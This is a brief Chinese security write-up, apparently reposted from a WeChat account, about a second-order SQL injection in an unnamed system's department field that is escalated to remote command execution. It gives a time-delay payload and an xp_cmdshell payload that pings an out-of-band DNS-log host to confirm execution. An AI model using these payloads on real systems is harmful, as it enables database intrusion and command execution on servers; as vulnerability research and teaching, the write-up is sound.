声明:本文仅用于网络安全相关知识分享,环境为本机靶场,请严格遵守网络安全相关法律法规。
未经授权利用本文相关技术从事违法活动的,一切后果由违法人自行承担!Jie安全公众号及作者不承担任何法律责任。
当某接口传参init为1时,会根据当前用户的uid(不可控)查询department并赋值给obj2
obj2直接拼进SQL语句中执行
找到个可以修改department的地方输入' WAITFOR DELAY '0:0:5'--
直接访问漏洞链接,用burp看有无延时
由于无回显,尝试打dnslog
burp开启dnslog
payload改为:
';exec master..xp_cmdshell 'ping u4zjw1z2qin2617mfv4uky3mgdm7aw.oastify.com'--
响应页面显示超时
但是dnslog打过来了
原文始发于微信公众号(Jie安全):代码审计之XX系统二次注入到RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论